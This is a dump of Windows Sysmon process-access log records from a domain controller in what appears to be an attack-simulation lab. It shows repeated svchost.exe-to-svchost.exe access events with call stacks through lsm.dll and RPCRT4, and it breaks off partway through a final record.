10341000x80000000000000004921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.262{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.246{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
